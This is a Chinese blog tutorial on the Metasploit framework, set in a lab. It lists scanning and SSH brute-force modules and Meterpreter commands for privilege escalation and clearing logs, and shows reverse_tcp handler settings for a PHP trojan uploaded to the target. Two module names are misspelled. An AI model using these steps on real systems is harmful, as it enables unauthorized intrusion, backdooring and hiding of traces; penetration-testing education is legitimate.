metasploit工具(msf)

已于 2024-04-03 14:44:22 修改
阅读量1.1k 收藏 19
点赞数 41
分类专栏: 工具使用 文章标签: 网络安全
于 2024-04-03 14:39:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73481504/article/details/137345075
版权

MSF基本介绍

Metasploit是一个广泛使用的开源渗透测试框架,它提供了大量的工具和模块,用于模拟各种安全攻击,帮助安全专业人员评估和增强系统的安全性。它由Rapid7公司的H.D. Moore在2003年创立,并且由一个庞大的社区支持。Metasploit包含了一个漏洞数据库,用户可以通过它来搜索和利用已知的安全漏洞。此外,Metasploit还具备生成后门、漏洞利用代码、木马、蠕虫等多种类型的恶意软件的能力

当有新的漏洞或者利用武器MSF如何更新

msfupdate

MSF功能模块

核心模块

Exploits(用来入侵,漏洞攻击库)

payloads(入侵后执行)

Auxiliary(辅助模块)

Post(维持权限)

Evasion

Encoder

Nops

MSF基本命令

msfconsole

启动交互终端

banner

展示banner

help 或?

查看帮助,help+命令

search

搜索漏洞和利用数据库

info

查看模块的信息

use XXX

使用模块

show options

查看所使用模块需要配置的参数

set name value

设置参数值

set name value

设置参数值

run/exploit

执行模块

back

退回到主界面

quit/exit

退出msf

Meterpreter 常用命令

help

查看可以使用的命令

sessions

查看会话

sysinfo

查看目标系统信息

sessions -i id

切换到指定会话

getuid

查看用户

sessions -k id

杀死指定会话

getpid

查看进程编号

shell

进入目标主机shell

pwd/getlwd

查看当前目录

upload <local><remote>

向目标主机上传文件

cd/lcd

切换目录

download <remote><local>

从目标主机下载文件

background

把当前会话放到后台

search

在目标主机上搜索文件search -f *test*

execute

在目标主机执行程序

execute -f notepad.exeexecute -H -i -f cmd.exe

getsystem

提权

clearev

消除痕迹

MSF信息收集实战

MSF信息收集

命令

说明

主机发现

use auxiliary/scanner/discovery/arp_sweep

端口扫描

use auxiliary/scanner/portscan/tcp

目录扫描

use auxiliary/scanner/http/dir_scanner

SSH暴破

use auxiliary/scanner/ssh/ssh_login

服务扫描

use auxiliary/scanner/mysql/mysal_version

use auxiliary/scancer/smb/smb_version

use auxiliary/scanner/telnet/telnet_version

use auxiliary/scanner/rdp/rdp_scanner

主机发现 -网段信息-所有存活的ip 扫描ip地址

show options 查看这个模块需要做哪些配置

设置搜索的网段

最后run运行 就可以看到当前存活的ip地址

扫描当前ip的端口

查看当前模块需要的配置

设置配置运行显示结果

目录扫描

目录扫描:探测一共网站根目录,其他文件,文件夹

意义:敏感文件,源码,数据备份

可能还有后台登录

使用目录扫描模块

upload 文件上传 login 后台登录 config配置文件

SSH爆破 利用22端口 ssh远程登录

使用这个模块

添加配置模块需要的参数

运行run查看结果

MSF生成木马和利用

当进行目录扫描时有upload的目录 可以利用这个给其上传病毒

复制这个网址在浏览器打开

1.怎么制作PHP木马?(会主动连接,能执行命令)

完成命令后home目录下会生成

在80端口开启个网站 监听80端口

靶机浏览器输入kali的地址 就可以下载kali里home目录的文件

2.制作木马后msf建立监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.142.162
set lport 7777
run

控制后想知道能做些什么

Caliy_
关注
  • 41
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
metasploit-framework工具
10-09
MSF漏洞测试工具 使用方法: 根据漏洞名称搜索 : search ms17_010 设置模块:use auxiliary/scanner/smb/smb_ms17_010 设置目标地址:set rhosts x.x.x.x 设置好了之后,run或者exploit 进行攻击
kali初讲——Metasploit工具MSF初学
萌蠢骇客
06-13 3957
kali初讲——Metasploit工具MSF初讲
工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 8万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
Metasploit(MSF)
m0_56010012的博客
05-10 649
它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 我们能够通过它发现漏洞并进行快速实施攻击,当然需要在授权的情况下。 综合渗透测试框架 Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持 Exploxits...
Metasploit(MSF)基础超级详细版
懂进攻知防守
08-02 1万+
The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。 ............
1.1 Metasploit 工具简介
CSDN
06-30 7714
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由`Rapid7`公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和`Payload`工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括`Windows、Linux、MacOS`等。直到今天`Metasploit`已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
渗透工具MSF系列培训教程(共17课)10-17课
06-20
第1课:什么是Metasploit 第2课:如何安装Metasploit 第3课:如何更新MSF及其结构 第4课:msf用户接口及核心命令 第5课:Exploits模块 第6课:payloads模块 第7课:利用MSF攻击windows 第8课:三个模块作用 第9...
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
Metasploit使用手册
12-22
Metasploit使用手册,详细介绍各种黑客工具,溢出的使用;
metasploit_data_models:MSF数据库代码,gemized
04-08
为开发人员提供一个轻量级的MSF后端入口点,以用于开发工具,该工具收集旨在供以后与Metasploit配合使用的数据(例如,专用扫描仪)。 在增加我们提供给社区的开源工具的功能的同时,可以轻松地使商业物品保持私有...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于关键词搜索结果的微博爬虫(下载即用).zip
05-21
基于关键词搜索结果的微博爬虫(下载即用).zip本项目适合计算机相关专业(如软件工程、计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载使用,当然也适合小白学习进阶。如果基础还行,可以在此代码基础上进行修改,以实现其他功能。 基于关键词搜索结果的微博爬虫(下载即用).zip本项目适合计算机相关专业(如软件工程、计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载使用,当然也适合小白学习进阶。如果基础还行,可以在此代码基础上进行修改,以实现其他功能。 基于关键词搜索结果的微博爬虫(下载即用).zip本项目适合计算机相关专业(如软件工程、计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载使用,当然也适合小白学习进阶。如果基础还行,可以在此代码基础上进行修改,以实现其他功能。 基于关键词搜索结果的微博爬虫(下载即用).zip本项目适合计算机相关专业(如软件工程、计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载使用,当然也适合小白学习进阶。如果基础还行,可以在此代码基础上进行修改
node-v4.4.1-headers.tar.xz
05-21
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
J波模拟matlab代码.zip
05-21
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
Obsidian quickadd插件
05-21
Obsidian quickadd插件
Fraunhofer Versatile Video Encoder (VVenC) v0.1
05-21
这份文件是关于Fraunhofer Versatile Video Encoder (VVenC) v0.1版本的文档,由Fraunhofer Heinrich Hertz Institute (HHI)的视频编码与分析部门的Jens Brandenburg, Adam Wieckowski, Tobias Hinz, Benjamin Bross撰写
node-v8.0.0-headers.tar.xz
最新发布
05-21
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Windows系统nodejs安装及环境配置
05-21
附件是windows系统nodejs安装及环境配置教程,文件格式是markdown,文件绿色安全,请大家放心下载,仅供交流学习使用,无任何商业目的!
JAVA基于J2ME的手机游戏开发(lw+源代码).zip
05-21
随着通信技术的发展和手机的普及,手机游戏的开发技术越来越为人们所关注。以J2ME为开发平台,利用Java提供强大工具,不但可以在手机上实现静态HTML技术所无法实现的计算处理、数据存储、与服务器的通信等功能,而且能够开发各种手机游戏。本文在介绍J2ME及其体系结构的基础上,以贪吃蛇游戏为实例,描述了借助J2ME的MIDlet类库开发手机游戏的过程。
msf 渗透工具学习材料
08-20
MSFMetasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值